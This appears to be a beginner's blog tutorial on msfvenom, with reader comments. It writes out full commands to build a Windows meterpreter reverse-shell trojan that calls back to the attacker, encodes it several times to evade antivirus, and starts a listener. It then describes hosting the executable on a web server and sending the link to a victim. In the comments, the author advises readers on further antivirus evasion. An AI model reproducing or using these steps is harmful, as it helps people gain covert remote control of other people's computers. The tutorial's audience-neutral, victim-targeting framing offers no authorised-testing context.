MSFvenom replacement of MSFpayload and msfencode Guide for Beginners


Hello and welcome to my blog. As you know, msfpayload was used to create payloads (generally called trojans or backdoors) and msfencode was used to encode payloads to avoid antivirus detection. You can read more in my old post Creating Trojan Horse (Encoded) By Using Msfpayload, but both msfpayload and msfencode were removed from the Metasploit Framework on June 8th, 2015.

So what replaces them now?

The answer is msfvenom.

In this article I will cover what msfvenom is, how to use it, how to generate and encode a payload with it, how to avoid bad characters, and how to start a multi/handler listener that receives the connection from the trojan backdoor.

What is msfvenom?

In simple words, msfvenom is a combination of msfpayload and msfencode: it generates payloads and encodes them as well. You no longer need to run two different commands to create a payload and then encode it. msfvenom ships with Metasploit by default, so you don't need to install an extra package on your system. For more detail about Metasploit and further tutorials, read the Metasploit guide section of this blog.

The Metasploit command line interface msfconsole and the GUI Armitage are preinstalled in the current Kali Linux version, Kali 2016.2. I will describe the tutorial using Kali Linux.

Let’s start using MSFvenom

In Kali Linux, right-click on the desktop, then click Open Terminal. In the new terminal window, type the following command:

#msfvenom -h

How to generate a payload using MSFvenom

To generate a payload, two switches must be used: -p and -f. -p selects the payload and -f the output file format. You should first know which payload you are going to use. To print the list of available payloads, use -l:

#msfvenom -l payloads

After selecting an appropriate payload, use the following command:

#msfvenom -p <payload> -f <file format>

To know more about the output formats, use:

#msfvenom --help-formats

msfvenom writes the generated payload to standard output, so redirect it to a file:

#msfvenom -p windows/meterpreter/reverse_tcp -f exe > PATH

The final command would be:

#msfvenom -p windows/meterpreter/reverse_tcp -f exe > /root/Desktop/trojan.exe

Before executing the final command you should know about the payload's options. The payload in the above command is meant to connect back to the attacker, but it will not do so, because its options are not specified yet. So you must know the available options for windows/meterpreter/reverse_tcp. Use the following command:

#msfvenom --payload-options -p <payload>

Now the command is:

#msfvenom -p windows/meterpreter/reverse_tcp LHOST=[attacker IP] LPORT=[desired port] -f exe > /root/Desktop/trojan.exe

#msfvenom -p windows/meterpreter/reverse_tcp LHOST=[attacker IP] LPORT=4444 -f exe > /root/Desktop/trojan.exe

The good news is that your payload is ready: you can send it to the victim machine, and when the victim executes the file the machine is compromised. But this payload is well known and most antivirus products are aware of it; they will easily detect the code and remove it. So what is next?

You can do the following things:

  1. Avoid bad characters
  2. Encode the payload
  3. Encode with multiple iterations

How to avoid bad characters in the payload by using msfvenom

As you have seen in the help output of msfvenom, the -b flag is used to keep certain bad characters out of the payload. When the -b switch is used, msfvenom finds a suitable encoder and encodes the payload so that the bad characters are avoided automatically:

#msfvenom -p windows/meterpreter/reverse_tcp LHOST=[attacker IP] LPORT=4444 -b '\x00' -f exe > /root/Desktop/trojan.exe

How to encode a payload by msfvenom

When you use the -b flag, the payload is encoded automatically with a suitable encoder. If you still want to use a specific encoder, use -e [encoder name]. Only the encoders shipped with msfvenom can be used, so first list the available encoders:

#msfvenom -l encoders

Your final command will be:

#msfvenom -p windows/meterpreter/reverse_tcp LHOST=[attacker IP] LPORT=4444 -e x86/shikata_ga_nai -f exe > /root/Desktop/trojan.exe

To set the number of times the payload is encoded, use -i:

#msfvenom -p windows/meterpreter/reverse_tcp LHOST=[attacker IP] LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > /root/Desktop/trojan.exe
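As an added illustration (not part of the original post and not Metasploit's own code), the Python below shows at the byte level what the -b check and an encoder have to achieve: it scans a constructed byte string for bad characters and picks a single-byte XOR key such that neither the key nor the encoded output contains one. The XOR scheme is a simplified stand-in, not how shikata_ga_nai works, and the input is made-up bytes, not a real payload.

```python
from typing import Dict, List, Optional

# Constructed sample bytes standing in for a payload; NOT real shellcode.
SAMPLE = b"\x48\x00\x65\x6c\x6c\x00\x21"

# The bad-character list from the -b example above: the NUL byte.
BAD_NUL = b"\x00"


def find_bad_chars(buf: bytes, bad: bytes) -> Dict[int, List[int]]:
    """Return {bad_byte: [offsets]} for every byte of `bad` found in `buf`.

    This is the principle behind -b: an encoder's output is only accepted
    if this result is empty, otherwise another encoder or key is tried.
    """
    hits: Dict[int, List[int]] = {}
    for offset, byte in enumerate(buf):
        if byte in bad:
            hits.setdefault(byte, []).append(offset)
    return hits


def xor_encode(buf: bytes, key: int) -> bytes:
    """Single-byte XOR; applying it twice with the same key restores buf."""
    return bytes(b ^ key for b in buf)


def pick_xor_key(buf: bytes, bad: bytes) -> Optional[int]:
    """Choose a key so neither the key nor the encoded bytes contain a bad char.

    Simplified illustration only (hypothetical scheme, not shikata_ga_nai).
    Returns None when no single-byte key can satisfy the constraint.
    """
    for key in range(1, 256):
        if key in bad:
            continue  # the key itself is stored in the output, so it counts
        if not find_bad_chars(xor_encode(buf, key), bad):
            return key
    return None


def encode_avoiding(buf: bytes, bad: bytes) -> Optional[bytes]:
    """Return the key byte followed by the encoded data, or None if impossible."""
    key = pick_xor_key(buf, bad)
    if key is None:
        return None
    return bytes([key]) + xor_encode(buf, key)


if __name__ == "__main__":
    print("bad chars in SAMPLE:", find_bad_chars(SAMPLE, BAD_NUL))
    print("encoded:", encode_avoiding(SAMPLE, BAD_NUL).hex())
```

In this scheme the key travels with the data and the decoding step is fixed, so the encoding only keeps the listed bytes out of the output; it hides nothing from anyone who can read or run the file, which is the same reason the encoded payloads on this page are still detected.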

Set the architecture and platform of the payload with msfvenom

-a <x64/x86> defines the architecture and --platform the platform, but first check the platforms available in Metasploit:

#msfvenom --help-platforms

#msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=[attacker IP] LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > /root/Desktop/trojan.exe

Start the multi/handler listener on the attacker machine

The trojan will be executed on the victim's machine and will connect back to the attacker machine, so the attacker must have a listener running there. You can start the multi/handler listener on your attacker machine in msfconsole with the following commands:

msf> use exploit/multi/handler

> set payload windows/meterpreter/reverse_tcp

> set LHOST [attacker IP]

> set LPORT 4444

This is a very important phase. You have created trojan.exe and started the multi/handler listener; the next step is sending it to the victim machine. I started the apache2 web server and moved trojan.exe to /var/www/html, and I forwarded port 80 on my router to my attacker machine. Then I sent the link http://AttackerIP/trojan.exe. The victim downloads the trojan and executes it, and the session is created.


6 thoughts on "MSFvenom replacement of MSFpayload and msfencode Guide for Beginners"

  1. I tried it, but antivirus, even Windows Defender, is able to detect the virus. Is there any other way to evade the detection even though there is Quick Heal Total Security?

    1. Hi Mitul,
      Your question is good, but this is well-known code, so every antivirus has its signature and detects it easily. Sometimes encoding works properly. If you really want to bypass AV, you should write your own code or use a paid encoder.

  2. I am getting this error:
    handler failed to bind (public ip):1337
    I am using my dynamic DNS host as LHOST.
